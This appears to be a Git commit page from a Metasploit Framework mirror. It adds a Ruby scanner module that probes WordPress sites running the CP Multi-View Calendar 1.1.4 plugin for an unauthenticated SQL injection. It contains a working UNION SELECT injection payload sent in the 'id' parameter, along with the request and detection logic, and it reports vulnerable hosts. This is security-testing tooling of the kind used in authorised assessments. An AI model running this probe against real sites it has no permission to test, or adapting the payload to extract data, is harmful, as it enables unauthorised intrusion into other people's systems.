infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #5167, WordPress CP Multi-View Calendar SQLI Scanner

bug/bundler_fix
Christian Mehlmauer 2015-04-19 23:36:23 +02:00
parent a5583debdc 8c0bcd2e03
commit ed9175d73f
No known key found for this signature in database
GPG Key ID: BCFF4FA966BC32C7
1 changed files with 75 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

75
modules/auxiliary/scanner/http/wordpress_cp_calendar_sqli.rb Normal file
View File

@ -0,0 +1,75 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'uri'
require 'msf/core'
class Metasploit4 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'CP Multi-View Calendar Unauthenticated SQL Injection Scanner',
'Description' => %q{
This module will scan given instances for an unauthenticated SQL injection
within the CP Multi-View Calendar plugin v1.1.4 for Wordpress.
},
'Author' =>
[
'Joaquin Ramirez Martinez', #discovery
'bperry' #metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'EDB', '36243'],
[ 'WPVDB', '7910' ]
],
'DisclosureDate' => 'Mar 03 2015'))
register_options([
OptString.new('TARGETURI', [true, 'Target URI of the Wordpress instance', '/'])
], self.class)
end
def run_host(ip)
right_marker = Rex::Text.rand_text_alpha(5)
left_marker = Rex::Text.rand_text_alpha(5)
flag = Rex::Text.rand_text_alpha(5)
vprint_status("#{peer} - Checking host")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, '/'),
'vars_get' => {
'action' => 'data_management',
'cpmvc_do_action' => 'mvparse',
'f' => 'edit',
'id' => "1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x#{left_marker.unpack("H*")[0]},0x#{flag.unpack("H*")[0]},0x#{right_marker.unpack("H*")[0]}),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--"
}
})
unless res && res.body
vprint_error("#{peer} - Server did not respond in an expected way")
return
end
result = res.body =~ /#{left_marker}#{flag}#{right_marker}/
if result
print_good("#{peer} - Vulnerable to unauthenticated SQL injection within CP Multi-View Calendar 1.1.4 for Wordpress")
report_vuln({
:host => rhost,
:port => rport,
:proto => 'tcp',
:name => "Unauthenticated UNION-based SQL injection in CP Multi-View Calendar 1.1.4 for Wordpress",
:refs => self.references.select { |ref| ref.ctx_val == "36243" }
})
end
end
end